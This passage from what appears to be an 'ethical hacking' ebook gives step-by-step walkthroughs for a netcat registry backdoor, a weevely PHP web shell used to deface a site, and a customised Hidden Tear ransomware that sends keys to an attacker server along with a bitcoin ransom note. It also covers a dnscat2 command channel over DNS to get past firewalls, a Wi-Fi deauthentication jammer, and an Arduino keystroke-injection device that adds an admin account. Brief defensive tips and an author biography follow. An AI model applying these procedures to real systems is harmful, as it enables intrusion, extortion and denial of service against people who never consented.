Now if we go to the Windows machine, we can try to locate this registry

entry. Search for that from the start, just try to find and search for the Netcat
value. You will see that the registry entry Netcat has been created, and this is
the value that we have just passed from meterpreter.
Going back to our Kali machine, we will reboot the remote computer. Notice
that the meterpreter session has died. Go back again to the Windows machine
after the reboot, and try to access that machine. Now we go directly to our
Kali and open a new terminal. Now if we issue the Netcat command pointing
to this compromised victim, we should have a quick remote shell. So let us
try that, v for verbose and to enter the host address 192.168.211.129 with the
port 666, hit enter and you will find that you have full remote access, you
have a shell for Windows, and you can do anything, so the sky is the limit
now and your backdoor is installed successfully. You can access the remote
target anytime even if the target machine has been patched or upgraded.

Deface a Website in Few Seconds

We are going to learn how to deface a website by replacing its contents in
just a few seconds using a tool called weevely. First of all, we will generate a
malicious file that will allow us to have remote access to the webserver in
order to manipulate its contents. This malicious file is our backdoor. Open
your terminal and write weevely, then write weevely generate, to generate
our backdoor, then select the password for your file, 123 in this case, then
select the path that you will create the file in.
We created the file on our desktop, try to open this file; it is encrypted, which
actually gives us another layer of protection.

I have created a simple website for this tutorial. It is a generic website that
has a couple of pages in addition to upload your CV page. The purpose is to
upload our backdoor file to this web server. Many of the websites in the wild
offer this feature where you can upload your CV, you can upload a couple of
images, many of them block PHP extension files, but some of them do not do
so, you have to check vulnerable websites for that. You can as well leverage
what we have learned before to remotely hack over FTP and then you can
upload your backdoor file. Navigate to upload your CV page, click on
browse, select the backdoor file that we have created and upload, you will see
that the file backdoor.php have been uploaded. It is supposedly uploaded
under a specific path, so copy this path, go again to your terminal and issue
the weevely command.
We want to establish a remote session with our backdoor file, we will use the
weevely command again, write weevely, then enter the URL and change the
upload.php to backdoor.php, and then provide your password. We have to
check if it is connected, just list and you will be able to see the content of the
files on the server, also you will be able to print working directory, and you
will see that we are working under the var/www/html content.
You can as well go to the root of these websites var/www/html and do
another listing, to see the index.php file, which is the homepage. Again, let us
go to the homepage and try to refresh, so now we want to deface this website,
we will remove the index.php and upload our index.php. You can type help
to see all the modules that you can use on weevely, such as upload files,
download files, brute force SQL, and SQL databases dump. For this purpose,
we will be using file upload file to remove commands.

Let us go again to the web browser and refresh the page so the index of PHP
now is gone. Again, let us go to our Kali machine and try to upload a simple
index.php file that we just created; it is on the desktop again. So
root/Desktop/index.php, now we specified the origin, we have to specify the
destination of that which will be again under var/www/html and it will be
named index.php.
It will give us a true, now let us go again to the website and refresh it and you
will notice that we have defaced the website and uploaded our own PHP
index file. In a nutshell, we installed the backdoor using the upload utility, we
connected to the backdoor, removed the index file and replaced it with our
own. Simple!

Understand the Hidden Tear Ransomware

This is a hands-on section on how to download the hidden tear ransomware,
edit it, and then execute it on a victim's machine. But before going further, let
me tell you some history about this ransomware. The hidden tear was an
open-source project whose goal was to create a simple ransomware in C-
Sharp. Unfortunately, the project was abandoned on GitHub, but currently it
has more than 400 forks. You can go to GitHub, find any of these forks, and
download it. The ransomware uses the symmetric AES algorithm to encrypt
the files of the victim, it will then send the symmetric key to a server that we
will set up and will leave the victim with a text file, having a message that
explains what happened. Encrypted files can be decrypted in adecrypter
program with encryption key.
You need first to install Visual Studio that supports C-Sharp language.
Download one of the forks of the hidden tear ransomware from Github; open
the files of the project in Visual Studio to edit them. After that, we will
configure a web server on Kali to receive the encryption keys, then we will
move the ransomware and the decrypter to the victim's machine and execute
the attack.
First of all, go to GitHub to https://github.com/goliate/hidden-tear, and
download the project. After that, open the downloaded file where you will be
presented with two main folders or two main projects; the hidden tear, which
is the solution and Visual Studio, and the decrypter, which will decrypt the
files. After extracting the file, double click on the hidden tear project and
open it in Visual Studio. Right-click on the Form1.cs and press on view code.
Let us walk through this to make our own version of the hidden tear
ransomware. As you can see below, this is the target of the server that we will
need to set up.

We will put the IP of our kali server, then we will create a simple php file that
will get the encryption keys via the info argument. Scrolling down, you will
be able to see the extension of the encrypted files (.locked by default); you
can change that to your own extension. Below, you will be able to see all the
extensions of the files that will be encrypted, you can add and remove any of
the files that you want to encrypt on the victim's machine.

Scrolling towards the end of the source code, you will see the string path
which is the path of the attack. In this example, the ransomware will only
encrypt the files under the test folder which is found on the desktop.
Navigating towards the end of the source code, you will see the test file that
we will be created on the victim’s machine, and the message that we will put
in this text file. For example, this message, "You have been hacked; send us
an amount of 0.5 bitcoins to this address to view your files again".

The most important part is the target URL. So, in this target URL, you are
sending the key from the victim to the web server that you have set up that
will contain encryption key. We will create a web server on the Kali machine,
and then we will create a php file on the root directory of the webserver to
receive the key.
So, for this purpose, we will call the file keys.php on the kali server’s root,
and we will get the information through the info argument. You need to
populate the IP of the web server; in this case, it is 192.168.211.143. Setting
up the web server is quite easy, go to your Kali machine and navigate to
var/www/html, list the contents; you have the index.php.
Now you need to create the keys.php file, use geditkeys.php, and once this
file opens, just paste the following code. This is the php script and the
keys.php file that will get the data from the info get argument and put it in the
data.txt file.
For the same purpose, we need to create the data.txt file in the same root path
of our web server.So use the same command gedit data.txt, open the file and
make sure to save it.

After you create the data.txt file, it is important to grant it access. Now go to
var/www/html, right-click on data.txt properties, then permissions, go to the
group, navigate to www-data and give it read and write access.
Now let us list the directory. We have the data.txt to save the encryption files
and the keys.php, which has the php script that will get the information via
the info get argument. The only thing left to do is to start the apache service.
Now everything is in place for the attack.

After we have edited the file with the path, extensions of the encrypted files,
the extension types, and the folder that we are going to attack along with
writing up the message to the victim, now it is time to compile the csharp
project. Navigate to the hidden-tear folder that you have downloaded under
the bin, under the debug folder, you will be able to see the hidden-tear.exe
file, as shown below.

Now open the decryptorcsharp project, and make sure to go to the path and
update it as we did for the ransomware files. Navigate to the build menu and
compile the solution. Navigating to the decrypter folder under bin, you will
find the decrypter.exe file created. Now we will move the ransomware and
the decrypter file to the victim's machine. Double click on the ransomware
and notice what will happen. The file will change to .redpython extension and
it will be encrypted. A new file as well will be populated that has our
message. Now go to the Kali machine.
Remember in the same directory, we had the file data.txt, so let us check
what is in that file. As you can see below, this is the name of the victim's
machine, this is the username of the victim, and this is the key use to encrypt
the file. Now, in order to decrypt the files, just run the hidden-tear decrypter,
paste the password, and then click decrypt files to have them decrypted.

To protect yourself against possible ransomware attacks, make sure to follow

the below advises.

Don’t pay the ransom

Restore from a good backup
 Keep your personal information PRIVATE
Use Antivirus that uses Machine Learning techniques
Use a Firewall
Use content filtering for emails

Bypass Firewalls by Tunneling Data and Commands

over DNS
It might be the only port that companies do not block, yes, this is the DNS
port.
Attackers can abuse this weakness in firewalls to set up a command and
control channel that can be very difficult to detect or even block. We need to
set up a server with dnscat2 software installed that will listen to the DNS
queries from the DNS to the client. Once this is established, we can transmit
data and even invoke commands over this channel, as depicted below.

All the traffic is blocked through the corporate firewall, except the DNS
traffic on port 53 that is used to resolve URLs. So, attackers will leverage
these open ports to set up an external command and control center to perform
various types of malicious acts.
First of all, we need to install the dnscat2 server on our Kali machine and
then run it. For this purpose, you just have to copy the code shown below to
update the repository of Kali and we will install Ruby on Rails, then we will
install the bundler, and then we will get the dnscat2 from GitHub, it will
clone it on our Kali machine, then we will navigate to dnscat2 directory and
then we will run bundle install.
apt-get update
 apt-get -y install ruby-dev git make g++A
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install
Now you need to run Ruby and invoke the dnscat2 command.
ruby ./dnscat2.rb
The dnscat2 servers will start listening to Port 53. And now our server will be
set up and ready.

For the client part, navigate to skullsecurity.org/dnscat2 and download the

Windows version. Open the command prompt, navigate to the desktop, and
invoke the following command. The IP is the IP of our Kali machine.
An encrypted session will be established on port 53, and the type will be the
TXT name MX. If you go again to your Kali machine, you will see that a
new window created session number one. Now a connection has been
established and the server has been notified of that.

To interact with the first session, type session-I 1, and you will see the name
of the client, the victim. Now we have a remote shell to interact with.

Type help to see all the commands that you can run remotely.
Now let us try to run notepad remotely. Just type execnotepad.exe and press
enter; it will tell you that the request has been sent.

Go to the victim’s machine and you will see that notepad is opened. With
creating each session, you will be notified on the server and you can interact
accordingly using this command of session-i and the number of the session.
Tunnels have been established between the client and server over Port 53,
just to make sure that it is over the port 53, we will run Wireshark in order to
sniff the traffic and investigate the type of traffic being sent and received. We
will select the proper interface and press capture. Wireshark is active on the
server-side, let us trigger the same notepad command.
As you will notice, the protocol captured is mainly DNS, so anyone who is
monitoring the victim's network traffic will only see DNS queries. This
traffic will of course blend with the noise that is present on many networks.
Let us say, for example, we are establishing the initial command and control
connection, it requires dnscat2 client to resolve a TXT record which is a very
normal thing to do, thus it will not trigger an alert. To protect against this
type of attack, you should block outbound DNS traffic and only allow trusted
DNS servers interaction.
Secret Sauce BONUS
Wi-Fi Jamming Tool
Have you ever thought of blocking Wi-Fi signals or kicking someone out
from your Wi-Fi connection? Well, this is the right topic for you. We are
going to create a simple Wi-Fi jammer that is so tiny that it can fit into your
pocket, so that you can carry it anywhere just by powering it up through a
simple power bank, or even your mobile phone.
First of all, browse to Ali Express and search for NodeMcu, and then click on
the first result which is a wireless module NodeMcu version.

MCU stands for a microcontroller unit, it is a small computer on a single IC

or integrated circuit. This device is used to prototype IoT products and
applications. It can act as a client, as a server, or as a wireless device at the
same time.
As per the description on the NodeMcu website, it is an open-source,
interactive, programmable, local, simple, smart Wi-Fi enabled device. The
authentication attack is the main application that we are going to build on this
chip. This attack will show you how vulnerable the 802.11 Wi-Fi standard is.
The authentication attack is used to disconnect devices from the Wi-Fi
network, which is a huge vulnerability in the official 802.11 Wi-Fi standard.
In 2009, the Wi-Fi Alliance fixed this problem in the 802.11w standard. They
increased security by providing data confidentiality of management's frames,
the added mechanisms that enabled data integrity and data authenticity, and
replay attack protection. However, the majority of the access points and
clients are vulnerable to this attack. Connect the device to your laptop using
USB cable, and go to the site https://sparks.gogo.co.nz/ch340.htmland install
the USB connectivity driver.

This is very important; as you need to see this in the device manager on your
Windows machine. It will tell you in which port it is connected to, as shown
below.

Navigate to the website deauth.me and set up the NodeMcu using the online
interactive step-by-step tutorial. It will ask you first if you are a novice or
expert, press novice. It will ask you to download the bin file, click to
download it from the GitHub. You can see the latest releases of the bin file
and download the latest release.
Let us go back to the site, press next, and select the operating system you are
using. You need to download the flasher software. The flasher software will
help you upload the bin file or populate the firmware on the NodeMcu
device. Press next, select the COM port that the board is on. Press next and
you will be presented with a step-by-step on how to upload the firmware.
You need to open the flasher, you will notice that the device is connected to
COM8 port, go to config and select the location for the bin file. Now it is
asking us to press on the operations tab and press on the flash button.
Next, select the COM8 port, then press on the flash button. It will take some
time to upload the firmware, once you see the checkmark, it means that the
firmware has been uploaded successfully.
Go to the advanced tab and use the default that you can see on the chip.

Now things are in place, you need to connect to this Wi-Fi SSID named
pwned, open the Wi-Fi, click pwned, and press connect. You will be
prompted to enter a password for the first time which is deauther. Navigate to
the IP 192.168.4 and you will be presented with the application that we have
just populated on the NodeMcu.
The first tab is used to scan all the neighboring Wi-Fi connections. Once you
do that, you will notice that the blue LED light on the chip will turn on, it will
take a couple of seconds and then it will turn off. Once it turns off, press on
the reload, you will get all the neighboring Wi-Fi networks.

After that, select one access point, and then press on the scan stations button.
Again, the blue lead on the chip will turn on, it will take 15 seconds to scan
the stations that are connected to this access point. During the scanning of the
stations, you will be disconnected from the pwned network. After the
scanning is complete, make sure to connected again to the pwned network.
Press on the reload button and go down to the stations section. Select all, so
we are selecting all the stations that are associated with this access point.
Then go to the attacks menu, you will note three types of attacks; the
authentication attack, beacon attack, and the probe.

As for the authentication attack, which is the main application, we will select
six targets. So, once we start pressing this time, it will start sending the de-
authentication frames to all these six targets, so none of these six targets will
be able to connect. This chip runs on 2.5 gigahertz, all the clients running on
2.5 gigahertz will be disconnected. All the clients running for example on the
5 gigahertz they will not be affected by this attack.
So, now we will discover the effect of this attack on a client that is connected
to our network. We can use another laptop, connect to the access point, and
use Google where there is an internet connection. Now we will initiate a de-
authentication attack from the NodeMcu and just notice what will happen in a
while. Just wait for a couple of seconds and you will see that there is a yellow
mark, which obviously says that there is no internet connectivity.
Refresh the list of Wi-Fi SSIDs, you will find that there is no internet access.
After a few seconds, it will identify the network and connect to it. Refresh the
list again, it is connected, but the de-authentication packets will disconnect
the client in a while. This can go on forever, depending on your
configuration.

Create a $3 Rubber Ducky Key-logger

Rubber Ducky is a keystroke injection tool disguised as a generic USB drive
as described on hackshop.com website. It is priced at $45e, you have to add
to that the shipping and the clearance costs thus it becomes really expensive.
However, rubber ducky has a simple scripting language that anyone can use
to simply craft payloads that can perform myriad of actions such as changing
system settings, creating back doors, stealing data, opening remote shells.
You can attack any operating system that supports a USB keyboard, just put
your payload on this USB and once it is plugged in any computer, it runs
automatically. We can achieve the same result by building a similar USB
drive in a much cheaper way using Arduino.
The Arduino boards are available commercially in preassembled form or a
do-it-yourself kit. You can go to alixpress.com and type in Arduino micro.
Some of the chips are really small and have a built-in USB connector, which
makes it easier for us to achieve a result similar to a rubber ducky.

Some of you might think how can Arduino be used to hack computers? Since
it supports keyboard emulation, we can build sketches on the Arduino IDE,
which is a file actually that has .ino extension. These sketches contain
keyboard instructions to type commands and execute, just like the popular
USB rubber ducky does. We upload our payload, and once the USB is
inserted, the script will automatically run. So let us start building that.
You need to install the Arduino IDE. Simply go to the console and write apt-
get install Arduino to install the IDE. To initiate or open the IDE, write
arduino in the terminal.
Go to the website https://github.com/hak5darren/USB-Rubber-
Ducky/wiki/Payloads. It is an amazing page that has a lot of rubber ducky
scripts.
So, let us begin with the first one which is the simplest one, hello world. If
you click on that, you will be able to see the simple scripting language that
rubber ducky supports.

But Arduino does not support the scripting language of ducky. So, we have to
convert this to the Arduino language. Navigate to
https://d4n5h.github.io/Duckuino/ website to convert the ducky script into the
Arduino language. You have to paste your code and press on compile and
just press on copy.
After that, open the Arduino IDE and paste the converted script. Just to give
you a quick overview on how this code works. So as you can see below, this
is a sketch file, it is just a regular file with .ino extension; it has two main
procedures; the setup procedure, and the loop procedure. It also includes
some of the important header files.
The setup procedure will only be executed when Arduino is powered on and
initialized, the loop procedure will be executed repeatedly over and over
again until Arduino is powered off.
We will plug our Arduino chip, connect it to our mini USB cable and plug it
into our laptop. Go to the tools menu and select the board, it is Arduino
Leonardo and the port is on com6. Compile the hello world converted code
you pasted. You should receive a message ‘Done compiling’. Upload the
script to the chip by pressing on the upload button. Open notepad, then plug
the device, to see the following:

Let us get real by going to

https://github.com/christofersimbar/ArduinoDuckyScript/tree/master/AddAdmin_Payload
This payload adds a user as an admin to the computer once you plug the USB
into it. So dangerous ha!
Let us copy the file content, convert it to Arduino script, and upload t to the
chip. If we scan this code, you will see that in this setup, you will start
keyboard and mouse, then start the payload by pressing windows ‘x’. This is
the left key, which is the Windows key plus ‘x’, and then you type ‘a’ to open
the power shell command. After that, you will write KEY_LEFT_ALT then
‘y’, for selecting yes. Now in the power shell command, you will issue this
line net user /add redpython P@ssw0rd. Let us add our After you have
created this user, you will add this user to the administrators group, as shown
below.

Compile then upload the code to the chip. You have to remove the USB as
fast as possible in order to avoid the attack being run on your computer. Our
payload is now loaded onto our Arduino device.
All that you need to do is to plug the USB in any machine you want to attack.
Once you do that, the sequence will take place in a matter of seconds. We
will open the users and see that redpython user is created in the admin group.
Biography
Mohamad Mahjoub is a prolific writer and a Cyber Security Expert. A
licensed and certified CISSP, ISO 27005 Risk Manager, CISA, PMP, ISO
27001 LI, and ITIL. He obtained his Master’s Degree in Computer Science
from the Lebanese American University, where he graduated with magna
cum laude. After spending many years working as an IT project manager for
one of the Multinational Pharmaceutical companies, Mohamad moved to the
Banking sector to attain a senior role in Information Security Audit. He has
then relocated to Dubai to join a smart university as an Information Security
Manager.
Mohamad’s accomplishment and research acumen is a drive force that’s
rooted in his professionalism. He is trained and certified to offer firsthand
professional Cyber Security services to individuals and companies. Since
2012, Mohamad has delivered many IT courses to fresh graduates, IT
professionals, executive management, and business owners, that’s on top of
his online multi-lingual Cyber Security courses that have more than 100,000
students enrolled worldwide, as of date. Currently, Mohamad works as CISO
for a French multinational company, where he is responsible for the security
of IT and OT of the industrial water technology operations throughout the
Arabian Gulf and Middle East area. With more than 16 years of experience in
the Cyber Security field, Mohamad is a trusted expert who have established a
track record of success in the Cyber Security domain.
In a world of ubiquitous technology; Mohamad believes that Cyber Security
is more important than ever.
I will be glad to connect with you through
LinkedIn:https://www.linkedin.com/in/mohammadmahjoub/

Also by Mohamad Mahjoub

https://www.xploitacademy.com
Claim your free ‘Ethical Hacking with Kali Linux’ course by using the
coupon KALIPENTEST.
You can as well use this link:
https://www.xploitacademy.com/courses/ethical-hacking-with-kali-linux?
coupon=KALIPENTEST